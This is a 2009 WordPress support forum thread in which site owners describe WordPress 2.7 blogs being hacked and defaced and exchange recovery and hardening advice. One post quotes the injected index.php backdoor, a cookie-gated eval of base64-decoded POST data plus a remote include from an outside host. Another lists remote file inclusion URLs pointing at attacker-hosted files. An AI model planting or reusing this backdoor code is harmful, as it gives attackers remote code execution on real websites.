http://wordpress.org/support/ WordPress › Support Topic: HACKED twice in one week ver 2.7 en Thu, 26 Nov 2009 14:37:07 +0000 http://wordpress.org/support/topic/237003#post-1261612 Wed, 28 Oct 2009 06:50:49 +0000 elizabethrichardson 1261612@http://wordpress.org/support/ <p>My websites were hacked over the weekend as stated in a previous post.</p> <p>I've been watching the influx of traffic from various hacking forums that obviously list the details of websites hit in the last batch of attacks. </p> <p>What I am noticing now is strange activity entering a server document command etc sent to a txt file on another url containing php code.</p> <p>Can someone suggest what is happening and if this is how access is gained...???</p> <p><a href="http://south-gippsland.net_serverdocument_root=http//cyberirc.fileave.com/id1.txt?" rel="nofollow">http://south-gippsland.net_serverdocument_root=http//cyberirc.fileave.com/id1.txt?</a></p> <p><a href="http://south-gippsland.netaction=logout&amp;siteurl=http//www.seeum.co.kr/zero/data/idxx.txt??" rel="nofollow">http://south-gippsland.netaction=logout&amp;siteurl=http//www.seeum.co.kr/zero/data/idxx.txt??</a> </p> http://wordpress.org/support/topic/237003#post-1259667 Mon, 26 Oct 2009 18:33:07 +0000 davewhittle 1259667@http://wordpress.org/support/ <p>I've also been hacked by QahTaN-SniPer, but on a GoDaddy shared account. All 3 sites hacked were on the same shared Linux hosting account with GoDaddy, so I don't think it's only HostGator with the problem, although at least one of the hacked domains was once on HostGator. GoDaddy is investigating now, but I'd sure like to know if this is a problem with shared hosting in general, GoDaddy/HostGator in particular, WordPress, or what - so I'll know what I need to do with any other accounts I have.</p> <p>Any information would be appreciated.</p> <p>Thanks,<br /> Dave </p> http://wordpress.org/support/topic/237003#post-1259589 Mon, 26 Oct 2009 17:21:24 +0000 Ipstenu 1259589@http://wordpress.org/support/ <p><a href="http://codex.wordpress.org/FAQ_My_site_was_hacked" rel="nofollow">http://codex.wordpress.org/FAQ_My_site_was_hacked</a></p> <p>Admittedly, it sounds like your host sucks, to allow that level of hacking on the server level. My last concern would be WP (my first would be 'How soon can I cancel my contract and MOVE?!') </p> http://wordpress.org/support/topic/237003#post-1259240 Mon, 26 Oct 2009 09:57:23 +0000 elizabethrichardson 1259240@http://wordpress.org/support/ <p>My entire hosting account consisting of around 22 websites (sub domains were not affected) was hit by the Palestine Telecommunications Company (paltel) (213.6.76.87) hacker over the weekend.</p> <p>20 x were running wordpress 2.8.4 or 2.8.5 and 2 x were created with frontpage, and my web host manager password needed to be reset so I could get access to overwrite index.php.</p> <p>I'm really confused about how to clear any other potential problems created by this hacker and all I've done so far is change passwords. Any other solutions would be greatly appreciated.</p> <p>All websites involved were hosted with Lonex Resellers. </p> http://wordpress.org/support/topic/237003#post-1111358 Sat, 20 Jun 2009 23:31:52 +0000 davespeaking 1111358@http://wordpress.org/support/ <p>I got hit by this hacker today.</p> <p>I'm running Wordpress 2.7 with the Thesis 1.4.2 theme.</p> <p>As described above, the hacker changed the homepage and altered the ADMIN user password. He also deleted my other user accounts.</p> <p>I fixed the problem by following the directions provided by freeon (ThankYou!). I went into PHPadmin and changed my admin password and reinstalled the Thesis Theme.</p> <p>A true pain in the ass, but not a catastrophe thanks to this invaluable forum.</p> <p>Dave</p> <p>Keywords : Saudi Arabia, qahtan-sniper, hacked, cobra </p> http://wordpress.org/support/topic/237003#post-1093031 Fri, 05 Jun 2009 20:03:08 +0000 sairah 1093031@http://wordpress.org/support/ <p>Oh no! I don't want that to happen! Thanks so much for posting this! I'll definitely try to look into it, even though I've removed the defacement. Would it still happen if I've removed the defacement? O.o </p> http://wordpress.org/support/topic/237003#post-1078412 Wed, 20 May 2009 01:02:04 +0000 chaoskaizer 1078412@http://wordpress.org/support/ <p>Hi sairah,<br /> Seem like you are on bad hosting network. The best approach is contact your host &amp; send them this link <a href="http://safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=en-US&amp;site=AS:6939">AS6939 (HURRICANE)</a> (you are within the same network). Ask them to fixes those mess because your domain is already inside the safebrowsing network list. You might get banned from major search engine if they don't do anything. </p> http://wordpress.org/support/topic/237003#post-1077389 Mon, 18 May 2009 22:51:39 +0000 sairah 1077389@http://wordpress.org/support/ <p>I'm having the same problem (it's just a defacement though, although so annoying, particularly since I'm not savvy to the level that I know how to fix it!). I run on Host Department...their service has not been the best, to be honest, but they give a lot of space and so I've stuck with them...</p> <p>But honestly, I get this fugly thing as my homepage:</p> <p><a href="http://www.sairah.endless-time.net" rel="nofollow">http://www.sairah.endless-time.net</a></p> <p>If anyone has ANY idea how to deal with this, please let me know, I'm at a loss ='( </p> http://wordpress.org/support/topic/237003#post-1076492 Sun, 17 May 2009 19:08:55 +0000 jean01 1076492@http://wordpress.org/support/ <p>I am hosted on hostgator and I have not been hacked.</p> <p>I use many of the hints at <a href="http://codex.wordpress.org/Hardening_WordPress">Hardening Wordpress</a> maybe that's why.</p> <p>I have 4 blogs at hostgator on 4 different domains and none of them has been hacked. </p> <p>I also have a complete FTP backup of my installation and have automated database backups emailed to me.</p> <p>Hope that this helps. </p> <p>jean<br /> ps<br /> watch me get hacked tomorrow now that i have posted this (fingers crossed) </p> http://wordpress.org/support/topic/237003#post-1046377 Wed, 15 Apr 2009 10:41:29 +0000 roxyghost 1046377@http://wordpress.org/support/ <p>I'm hosted on Heart Internet and got hacked just over a week ago (2.7). They used the forgot password functionality somehow to change the password and then used the theme editor to upload their files. Think it was just a defacement but since I was away last week I have yet to go through everything and restore it to normality.</p> <p>The odd thing was, I checked my stats and they found my blog by searching MSN search for the IP of the heart server and the word "wordpress".</p> <p>Would appreciate some thoughts on this! </p> http://wordpress.org/support/topic/237003#post-1013978 Fri, 13 Mar 2009 00:51:52 +0000 whooami 1013978@http://wordpress.org/support/ <p>A small orange &gt;</p> <p><a href="http://www.asmallorange.com/services/hosting/" rel="nofollow">http://www.asmallorange.com/services/hosting/</a> </p> http://wordpress.org/support/topic/237003#post-1013974 Fri, 13 Mar 2009 00:49:04 +0000 silvalex 1013974@http://wordpress.org/support/ <p>Does anyone have a more secure host they would recommend that is cost effective? </p> http://wordpress.org/support/topic/237003#post-992080 Fri, 20 Feb 2009 02:30:30 +0000 samboll 992080@http://wordpress.org/support/ <p>yea - folks need to realize on shared servers that 90% of hacks come from someone having crappy security on their site or the host them self has crappy security.<br /> Then there's the 10% who think upgrades are a pain and put them off.<br /> :&gt;) </p> http://wordpress.org/support/topic/237003#post-992046 Fri, 20 Feb 2009 02:15:57 +0000 whooami 992046@http://wordpress.org/support/ <p>you noticed that too, sam ... :P </p> http://wordpress.org/support/topic/237003#post-992043 Fri, 20 Feb 2009 02:14:00 +0000 samboll 992043@http://wordpress.org/support/ <p>I think you folks with Hostgator have a serious problem. This is the 3rd thread I've seen with hacked blogs and them as host- I would be asking them what the...? </p> http://wordpress.org/support/topic/237003#post-991984 Fri, 20 Feb 2009 01:29:05 +0000 kjodies 991984@http://wordpress.org/support/ <p>sunny51: Every single file on your server has changed and now you think you can prove, that "Get Recent Comments" contains malicious code? Maybe it does on your server, but of course it does not in it's original state, when you downloaded it from <a href="http://wordpress.org/extend/plugins/get-recent-comments/" rel="nofollow">http://wordpress.org/extend/plugins/get-recent-comments/</a>. </p> http://wordpress.org/support/topic/237003#post-980315 Mon, 09 Feb 2009 11:09:01 +0000 sunny51 980315@http://wordpress.org/support/ <p><strong>UPDATE:</strong><br /> Further research showed that there is a plugin that contains malicious code disguised as an image. The plugin is Get Recent Comments..</p> <blockquote><p>todo.cache was found in a plugin directory named "Get Recent Comments".<br /> The "picture" file was found in the Uploads folder, where normal pictures reside... </p></blockquote> <p>We are tightening security on the blogs and will update when complete </p> http://wordpress.org/support/topic/237003#post-980248 Mon, 09 Feb 2009 08:44:29 +0000 sunny51 980248@http://wordpress.org/support/ <p>Hi,</p> <p>We also are on HostGator (2 different accounts) and were hacked on 2 of our 2.7 installations. The attack is noticed when you can't log in to your blog and are send into a loop (no error message either).</p> <p>Once we check the DB users table we have a new user called WordPress and then I assume there is some new content added to the blog although we were not able to find it. Look for some comment spam and maybe new content.</p> <p>The second attack from last night was more severe and it seems like the entire blog was reloaded with 2007 version files. I mean EVERY single file on the server is dated 2007. That way we can't tell which files were changed and we must assume everything is compromised.</p> <p>The attack includes the addition of these lines into index.php and xmlrpc.php was also changed. <strong>This is index.php</strong>:</p> <pre><code>&lt;?php if(md5($_COOKIE[&#39;c9a8b336f8ead0e0&#39;])==&quot;5dfa4a678793aeaee3d9394d72d12147&quot;){ eval(base64_decode($_POST[&#39;file&#39;])); exit; } ?&gt;&lt;?php /** * Front to the WordPress application. This file doesn&#39;t do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define(&#39;WP_USE_THEMES&#39;, true); /** Loads the WordPress Environment and Template */ if (isset($_GET[&#39;license&#39;])) { @include(&#39;http://wordpress.net.in/license.txt&#39;); } else { require(&#39;./wp-blog-header.php&#39;); } ?&gt;</code></pre> <p>We are now reinstalling and using a backup copy of the content. We will be tightening the file permissions and will watch closely. </p> <p>I am worried that there is 2.7 vulnerability that is easily exploitable, if anyone has any ideas please let me know...</p> <p>THANKS :) </p> http://wordpress.org/support/topic/237003#post-973208 Mon, 02 Feb 2009 01:51:59 +0000 freeon 973208@http://wordpress.org/support/ <p>I'm using hostgator too. I have done what wpsec has suggested. So far so good. They hacked multiple wp sites of mine. Easy enough to fix...just a waste of time. In the real world I have to deal with idiots tagging my garage with graffiti. In cyberspace its children hacking. Pull yourself up by your bootstraps and keep on walking...lol. I make money on the internet...hackers waste their lives on the internet! At the end of the day I win. </p> http://wordpress.org/support/topic/237003#post-966182 Sun, 25 Jan 2009 19:24:27 +0000 mgarabed 966182@http://wordpress.org/support/ <p>Freeon, my wordpress sites and one non wordpress site were also hacked into by the same assassin hackers on friday night/saturday morning (multiple sites, but one hosting account). Seems like a defacement only. Have you done anything furthur to secure your setup? Also, I am using hostgator, and I don't know if it has anything to do with them or not. I changed the index.html pages. Rather annoying.. </p> http://wordpress.org/support/topic/237003#post-965667 Sun, 25 Jan 2009 05:35:26 +0000 freeon 965667@http://wordpress.org/support/ <p>Wpsec thanks for the additional info...well received. Additionally I found the forum that the hackers hang out, trade their hacking software and boast about their so called defacements. <a href="http://arabic-m.com/index.php?page=mirror&#38;id=18268" rel="nofollow">http://arabic-m.com/index.php?page=mirror&#38;id=18268</a> might be a good idea for security to reverse engineer their hacking software to prevent future attacks. Little children must play cat and mouse. </p> http://wordpress.org/support/topic/237003#post-964957 Sat, 24 Jan 2009 07:04:03 +0000 wpsec 964957@http://wordpress.org/support/ <p>I've fixed many hacks like this in the past few months alone. Do your site 3 favors: </p> <p>1. Create a new administrator user (so that it doesn't have ID 1 in the database) then delete any other administrator accounts that you don't need. And since you've already set your password using MD5 go reset it to something new (using the reset password feature of Wordpress) so that it will use the encryption 'salt' built into more recent WP versions, otherwise your MD5 passwords are subject to dictionary attacks and rainbow table attacks...</p> <p>2. Remove write permissions from all of your theme files. You will no longer be able to edit your theme files using the WP theme editor but that's a small price to pay. </p> <p>3. Sign up to get the soon-to-be-released beta of <a href="http://wpsecurity.net">Maximum Security for Wordpress</a>. Ya, that's a shameless plug... I hope it helps you though.</p> <p>Finally, don't believe for one second that you've really identified the bad guys responsible for messing with your sites. It's extremely easy to cover one's tracks on the Internet and make it look as though someone else is responsible for whatever activity. "False flag" operations are incredibly common. Most bad guys already know how to do that and do it as a matter of habit. To really track down a bad guy typically requires the cooperation of many ISPs across the world - although once in a while a bad guy turns out to be a complete idiot that is all too easy find. That's rather rare. </p> http://wordpress.org/support/topic/237003#post-964789 Sat, 24 Jan 2009 01:35:27 +0000 freeon 964789@http://wordpress.org/support/ <p>My sites are being hacked like wildfire. I am madder than a hornet. Wordpress ver 2.7<br /> They change the theme index.php to display a pic of a cobra with the Assassin Hackers moniker.<br /> FIX<br /> Upload your original theme that you are using index.php to fix the site.<br /> They also delete the admin user #1 from the mysql database.<br /> Use phpmyadmin in your cpanel to access your database.<br /> Select your database on the left sidebar<br /> Find wp_users and select browse<br /> Note that user 1 is missing...thats what the hacker deleted<br /> My easy fix is to take another id 2 or 3 etc and click edit<br /> Change id value to <strong>1</strong><br /> Change user_login value to <strong>your username</strong><br /> user_pass row set function to <strong>MD5</strong> and value to <strong>your password</strong><br /> Change user_name value to <strong>your username</strong><br /> Click <strong>Go</strong></p> <p>You are now a little less frustrated because you can now log into your admin panel but are ticked off that your site has been hacked twice in the last week. Your hosting provider can not stop the attacks and tells you to upgrade to the latest version of wordpress which you are already running.</p> <p>These are who the hackers were:</p> <p>Rafah, Palestinian Territory<br /> Palestine Telecommunications Company (paltel) (213.6.180.183)</p> <p>Riyadh, Ar Riyad, Saudi Arabia<br /> Nesma (89.4.242.73)</p> <p>Hosting co banned their ip's but said all they need to do is reset their modems and they are back in again with new ip's </p>